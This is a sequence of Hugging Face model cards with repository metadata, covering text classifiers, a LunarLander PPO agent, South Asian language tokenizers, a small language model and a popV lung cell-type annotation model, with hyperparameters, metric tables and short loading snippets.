- name: cleaned_context_all_sentences
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cleaned_context_all_sentences
This model is a fine-tuned version of [google-bert/bert-base-uncased](https://huggingface.co/google-bert/bert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3971
- Accuracy: 0.847
- Auc: 0.774
- Precision: 0.667
- Recall: 0.296
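No usage example is included; a minimal inference sketch follows (the label names, and the fact that the task is binary classification, are assumptions inferred from the accuracy/AUC/precision/recall metrics above).
```python
from transformers import pipeline

# Minimal sketch; the label mapping is not documented in this card
classifier = pipeline("text-classification", model="aayush7511/cleaned_context_all_sentences")
print(classifier("This sentence provides relevant context for the question being asked."))
```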
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Auc | Precision | Recall |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:-----:|:---------:|:------:|
| 0.4744 | 1.0 | 321 | 0.4293 | 0.833 | 0.712 | 0.7 | 0.122 |
| 0.4415 | 2.0 | 642 | 0.4169 | 0.824 | 0.745 | 0.533 | 0.139 |
| 0.4278 | 3.0 | 963 | 0.4276 | 0.833 | 0.745 | 0.722 | 0.113 |
| 0.4106 | 4.0 | 1284 | 0.4071 | 0.844 | 0.761 | 0.653 | 0.278 |
| 0.4081 | 5.0 | 1605 | 0.4005 | 0.844 | 0.763 | 0.623 | 0.33 |
| 0.4073 | 6.0 | 1926 | 0.3974 | 0.841 | 0.766 | 0.633 | 0.27 |
| 0.3931 | 7.0 | 2247 | 0.3953 | 0.849 | 0.774 | 0.705 | 0.27 |
| 0.3919 | 8.0 | 2568 | 0.3965 | 0.849 | 0.769 | 0.661 | 0.322 |
| 0.3862 | 9.0 | 2889 | 0.4061 | 0.842 | 0.773 | 0.706 | 0.209 |
| 0.3794 | 10.0 | 3210 | 0.3971 | 0.847 | 0.774 | 0.667 | 0.296 |
### Framework versions
- Transformers 4.55.4
- Pytorch 2.8.0
- Datasets 4.0.0
- Tokenizers 0.21.4
|
bita-rhz/ppo-LunarLander-v2
|
bita-rhz
| 2025-09-23T15:44:54Z | 0 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"LunarLander-v2",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-23T15:41:50Z |
---
library_name: stable-baselines3
tags:
- LunarLander-v2
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: 260.71 +/- 21.21
name: mean_reward
verified: false
---
# **PPO** Agent playing **LunarLander-v2**
This is a trained model of a **PPO** agent playing **LunarLander-v2**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
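Until the author fills in the TODO above, the following sketch shows the usual loading-and-evaluation pattern for a Hub-hosted SB3 checkpoint (the checkpoint filename inside the repository is an assumption; adjust it to the actual `.zip` name).
```python
import gymnasium as gym
from huggingface_sb3 import load_from_hub
from stable_baselines3 import PPO
from stable_baselines3.common.evaluation import evaluate_policy

# Download the checkpoint from the Hub (the filename is an assumption, not documented in this card)
checkpoint = load_from_hub(repo_id="bita-rhz/ppo-LunarLander-v2", filename="ppo-LunarLander-v2.zip")
model = PPO.load(checkpoint)

# Evaluate the agent over a few episodes
env = gym.make("LunarLander-v2")
mean_reward, std_reward = evaluate_policy(model, env, n_eval_episodes=10, deterministic=True)
print(f"mean_reward={mean_reward:.2f} +/- {std_reward:.2f}")
```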
|
Sai5480/monolingual-tokenizer-native-urd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:52Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"urd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:42Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- urd
- vocab-128000
---
# Monolingual Tokenizer - Urdu (Vocab 128000)
This is a monolingual tokenizer trained on Urdu text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-urd-vocab-128000")
```
## Files
- `urd.model`: SentencePiece model file
- `urd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Urdu (urd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
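Note that the Usage snippet above assumes the tokenizer is available under that local name; loading from the Hub would normally use the full repo id (`Sai5480/monolingual-tokenizer-native-urd-vocab-128000`). Because the repository ships a raw SentencePiece model, it can also be used directly with the `sentencepiece` package; a minimal sketch (downloading via `huggingface_hub` is an assumption):
```python
from huggingface_hub import hf_hub_download
import sentencepiece as spm

# Fetch the SentencePiece model file listed in the Files section
model_path = hf_hub_download(repo_id="Sai5480/monolingual-tokenizer-native-urd-vocab-128000", filename="urd.model")

sp = spm.SentencePieceProcessor(model_file=model_path)
pieces = sp.encode("یہ ایک مثال ہے", out_type=str)  # subword pieces for a short Urdu sentence
ids = sp.encode("یہ ایک مثال ہے")                    # corresponding token ids
print(pieces)
print(sp.decode(ids))
```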
|
Sai5480/monolingual-tokenizer-native-snd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:18Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"snd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:06Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- snd
- vocab-128000
---
# Monolingual Tokenizer - Sindhi (Vocab 128000)
This is a monolingual tokenizer trained on Sindhi text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-snd-vocab-128000")
```
## Files
- `snd.model`: SentencePiece model file
- `snd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Sindhi (snd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
Sai5480/monolingual-tokenizer-native-guj-vocab-128000
|
Sai5480
| 2025-09-23T15:40:16Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"guj",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:40:02Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- guj
- vocab-128000
---
# Monolingual Tokenizer - Gujarati (Vocab 128000)
This is a monolingual tokenizer trained on Gujarati text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-guj-vocab-128000")
```
## Files
- `guj.model`: SentencePiece model file
- `guj.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Gujarati (guj)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
ZaneHorrible/hs_adib_banglabert
|
ZaneHorrible
| 2025-09-23T15:40:05Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"electra",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:36:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Kuongan/Halphobert-large_finetuned
|
Kuongan
| 2025-09-23T15:37:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:vinai/phobert-large",
"base_model:finetune:vinai/phobert-large",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:12:40Z |
---
library_name: transformers
license: mit
base_model: vinai/phobert-large
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: Halphobert-large_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Halphobert-large_finetuned
This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on an unspecified dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7409
- Accuracy: 0.7486
- F1 Macro: 0.7478
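A usage snippet is not included; the sketch below shows a minimal inference call. Note that PhoBERT models are normally fed word-segmented Vietnamese text (e.g. via VnCoreNLP or pyvi); whether that preprocessing was applied during fine-tuning is not documented here, so treat the example input as an assumption.
```python
from transformers import pipeline

# Minimal sketch; the label mapping and the expected preprocessing are not documented in this card
classifier = pipeline("text-classification", model="Kuongan/Halphobert-large_finetuned")
print(classifier("Bộ phim này thật_sự rất hay ."))  # example of word-segmented input (assumed preprocessing)
```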
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: OptimizerNames.ADAMW_TORCH with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 20
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 1.0965 | 1.0 | 88 | 0.8876 | 0.6014 | 0.5940 |
| 0.7658 | 2.0 | 176 | 0.7050 | 0.735 | 0.7361 |
| 0.6118 | 3.0 | 264 | 0.7218 | 0.7407 | 0.7425 |
| 0.4813 | 4.0 | 352 | 0.7409 | 0.7486 | 0.7478 |
| 0.3701 | 5.0 | 440 | 0.7899 | 0.7393 | 0.7405 |
| 0.2655 | 6.0 | 528 | 0.8799 | 0.7329 | 0.7335 |
| 0.2237 | 7.0 | 616 | 0.9862 | 0.7207 | 0.7215 |
| 0.1591 | 8.0 | 704 | 1.0564 | 0.7307 | 0.7317 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
ziadrone/training_output
|
ziadrone
| 2025-09-23T15:35:12Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:shivash/enhanced-hybrid-transformer-768d",
"base_model:finetune:shivash/enhanced-hybrid-transformer-768d",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:34:46Z |
---
library_name: transformers
license: apache-2.0
base_model: shivash/enhanced-hybrid-transformer-768d
tags:
- generated_from_trainer
model-index:
- name: training_output
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# training_output
This model is a fine-tuned version of [shivash/enhanced-hybrid-transformer-768d](https://huggingface.co/shivash/enhanced-hybrid-transformer-768d) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 5.8198
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.0101 | 0.3366 | 250 | 6.9214 |
| 6.4366 | 0.6732 | 500 | 6.4452 |
| 6.1029 | 1.0094 | 750 | 6.1787 |
| 5.8866 | 1.3460 | 1000 | 6.0269 |
| 5.7574 | 1.6826 | 1250 | 5.9218 |
| 5.6024 | 2.0188 | 1500 | 5.8609 |
| 5.4617 | 2.3554 | 1750 | 5.8362 |
| 5.4463 | 2.6920 | 2000 | 5.8198 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
davidquarel/jaxgmg_ckpt_pt_OLD
|
davidquarel
| 2025-09-23T15:32:46Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-08-15T19:52:19Z |
Out of date. See https://huggingface.co/davidquarel/jaxgmg_ckpt_zip instead
|
popV/tabula_sapiens_Lung
|
popV
| 2025-09-23T15:29:49Z | 0 | 0 |
popV
|
[
"popV",
"joblib",
"biology",
"genomics",
"single-cell",
"anndata_version:0.12.2",
"scikit_learn_version:1.7.2",
"organism:Homo sapiens",
"python_version:3.12.8",
"tissue: lung",
"license:cc-by-4.0",
"region:us"
] | null | 2025-01-23T02:45:23Z |
---
library_name: popV
license: cc-by-4.0
tags:
- biology
- genomics
- single-cell
- anndata_version:0.12.2
- scikit_learn_version:1.7.2
- organism:Homo sapiens
- python_version:3.12.8
- popV
- 'tissue: lung'
---
Popular Vote (popV) model for automated cell type annotation of single-cell RNA-seq data. We provide here pretrained models
for plug-in use in your own analysis.
Follow our [tutorial](https://github.com/YosefLab/popV/blob/main/tabula_sapiens_tutorial.ipynb) to learn how to use the model for cell type annotation.
# Model description
Tabula Sapiens is a benchmark, first-draft human cell atlas of over 1.1M cells from 28 organs of 24 normal human subjects. This work is the product of the Tabula Sapiens Consortium. Taking the organs from the same individual controls for genetic background, age, environment, and epigenetic effects, and allows detailed analysis and comparison of cell types that are shared between tissues.
**Link to CELLxGENE**:
Link to the [data](https://cellxgene.cziscience.com/e/0d2ee4ac-05ee-40b2-afb6-ebb584caa867.cxg/) in the CELLxGENE browser for interactive exploration of the data and download of the source data.
**Training Code URL**:
Not provided by uploader.
# Metrics
We provide here accuracies for each of the experts and the ensemble model. The validation set accuracies are
computed on a 10% random subset of the data that was not used for training.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 2 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| capillary endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basal cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 1 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| intermediate monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD4-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD8-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of artery | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| club cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vein endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| lung ciliated cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| alveolar adventitial fibroblast | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| respiratory goblet cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| natural killer cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pericyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| B cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| adventitial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| non-classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| neutrophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of lymphatic vessel | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| bronchial smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mature NK T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasma cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vascular associated smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| myeloid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary ionocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mesothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasmacytoid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| serous cell of epithelium of bronchus | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mast cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
The train accuracies are computed on the training data.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 14833 | 0.96 | 0.98 | 0.97 | 0.98 | 0.00 | 0.95 | 0.97 | 0.96 | 0.98 |
| pulmonary alveolar type 2 cell | 10436 | 0.97 | 0.97 | 0.98 | 0.98 | 0.00 | 0.95 | 0.97 | 0.97 | 0.98 |
| capillary endothelial cell | 6474 | 0.96 | 0.96 | 0.97 | 0.97 | 0.00 | 0.97 | 0.96 | 0.97 | 0.98 |
| basal cell | 3605 | 0.93 | 0.94 | 0.94 | 0.94 | 0.00 | 0.91 | 0.95 | 0.95 | 0.96 |
| pulmonary alveolar type 1 cell | 2824 | 0.96 | 0.98 | 0.96 | 0.97 | 0.00 | 0.98 | 0.98 | 0.97 | 0.98 |
| intermediate monocyte | 2493 | 0.61 | 0.68 | 0.75 | 0.74 | 0.00 | 0.73 | 0.83 | 0.88 | 0.83 |
| CD4-positive, alpha-beta T cell | 1903 | 0.87 | 0.89 | 0.87 | 0.89 | 0.00 | 0.89 | 0.90 | 0.92 | 0.92 |
| CD8-positive, alpha-beta T cell | 1717 | 0.86 | 0.87 | 0.85 | 0.86 | 0.00 | 0.87 | 0.87 | 0.90 | 0.90 |
| endothelial cell of artery | 1584 | 0.76 | 0.81 | 0.83 | 0.82 | 0.00 | 0.83 | 0.82 | 0.83 | 0.85 |
| club cell | 1578 | 0.81 | 0.84 | 0.89 | 0.87 | 0.00 | 0.76 | 0.86 | 0.86 | 0.89 |
| classical monocyte | 1428 | 0.59 | 0.61 | 0.66 | 0.65 | 0.00 | 0.74 | 0.83 | 0.93 | 0.82 |
| basophil | 1193 | 0.98 | 0.98 | 0.99 | 0.99 | 0.00 | 0.98 | 0.98 | 0.98 | 0.99 |
| vein endothelial cell | 1187 | 0.79 | 0.83 | 0.85 | 0.84 | 0.00 | 0.84 | 0.86 | 0.88 | 0.87 |
| lung ciliated cell | 1075 | 0.96 | 0.97 | 0.98 | 0.98 | 0.00 | 0.97 | 0.98 | 0.97 | 0.98 |
| alveolar adventitial fibroblast | 1002 | 0.88 | 0.86 | 0.86 | 0.90 | 0.00 | 0.94 | 0.97 | 0.96 | 0.95 |
| respiratory goblet cell | 937 | 0.83 | 0.87 | 0.87 | 0.85 | 0.00 | 0.76 | 0.88 | 0.88 | 0.90 |
| natural killer cell | 928 | 0.91 | 0.92 | 0.91 | 0.92 | 0.00 | 0.92 | 0.95 | 0.96 | 0.96 |
| pericyte | 681 | 0.81 | 0.89 | 0.92 | 0.92 | 0.00 | 0.94 | 0.97 | 0.97 | 0.97 |
| B cell | 596 | 0.97 | 0.96 | 0.97 | 0.97 | 0.00 | 0.98 | 0.99 | 0.99 | 0.99 |
| adventitial cell | 533 | 0.81 | 0.82 | 0.79 | 0.82 | 0.00 | 0.90 | 0.96 | 0.96 | 0.93 |
| non-classical monocyte | 469 | 0.26 | 0.12 | 0.24 | 0.17 | 0.00 | 0.38 | 0.72 | 0.79 | 0.63 |
| monocyte | 464 | 0.42 | 0.33 | 0.50 | 0.48 | 0.00 | 0.62 | 0.78 | 0.87 | 0.75 |
| neutrophil | 338 | 0.95 | 0.97 | 0.96 | 0.95 | 0.00 | 0.96 | 0.97 | 0.95 | 0.99 |
| endothelial cell of lymphatic vessel | 285 | 0.98 | 0.98 | 0.97 | 0.96 | 0.00 | 0.97 | 0.99 | 0.99 | 0.98 |
| bronchial smooth muscle cell | 201 | 0.52 | 0.59 | 0.67 | 0.58 | 0.00 | 0.79 | 0.93 | 0.95 | 0.92 |
| mature NK T cell | 146 | 0.35 | 0.19 | 0.38 | 0.33 | 0.00 | 0.64 | 0.80 | 0.88 | 0.86 |
| plasma cell | 139 | 0.75 | 0.85 | 0.89 | 0.95 | 0.00 | 0.94 | 0.96 | 0.95 | 0.94 |
| vascular associated smooth muscle cell | 113 | 0.44 | 0.63 | 0.74 | 0.61 | 0.00 | 0.84 | 0.94 | 0.96 | 0.93 |
| myeloid dendritic cell | 29 | 0.00 | 0.12 | 0.76 | 0.60 | 0.00 | 0.65 | 0.87 | 0.97 | 0.95 |
| pulmonary ionocyte | 23 | 0.00 | 0.89 | 0.88 | 0.67 | 0.00 | 0.71 | 0.92 | 0.90 | 0.96 |
| mesothelial cell | 17 | 0.36 | 0.71 | 0.74 | 0.77 | 0.00 | 0.47 | 0.85 | 0.87 | 0.74 |
| plasmacytoid dendritic cell | 15 | 0.97 | 0.00 | 1.00 | 0.94 | 0.00 | 0.65 | 1.00 | 1.00 | 1.00 |
| serous cell of epithelium of bronchus | 13 | 0.00 | 0.38 | 0.00 | 0.38 | 0.00 | 0.28 | 0.79 | 0.93 | 0.63 |
| mast cell | 3 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.30 | 1.00 | 0.75 | 0.80 |
# References
Tabula Sapiens reveals transcription factor expression, senescence effects, and sex-specific features in cell types from 28 human organs and tissues, The Tabula Sapiens Consortium; bioRxiv, doi: https://doi.org/10.1101/2024.12.03.626516
|
hi-paris/CosyVoice2-EU
|
hi-paris
| 2025-09-23T15:26:25Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T15:26:25Z |
---
license: apache-2.0
---
|
noobmaster6009/Qwen3-0.6B-Gensyn-Swarm-stocky_colorful_gecko
|
noobmaster6009
| 2025-09-23T15:26:08Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am stocky_colorful_gecko",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T18:08:07Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am stocky_colorful_gecko
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
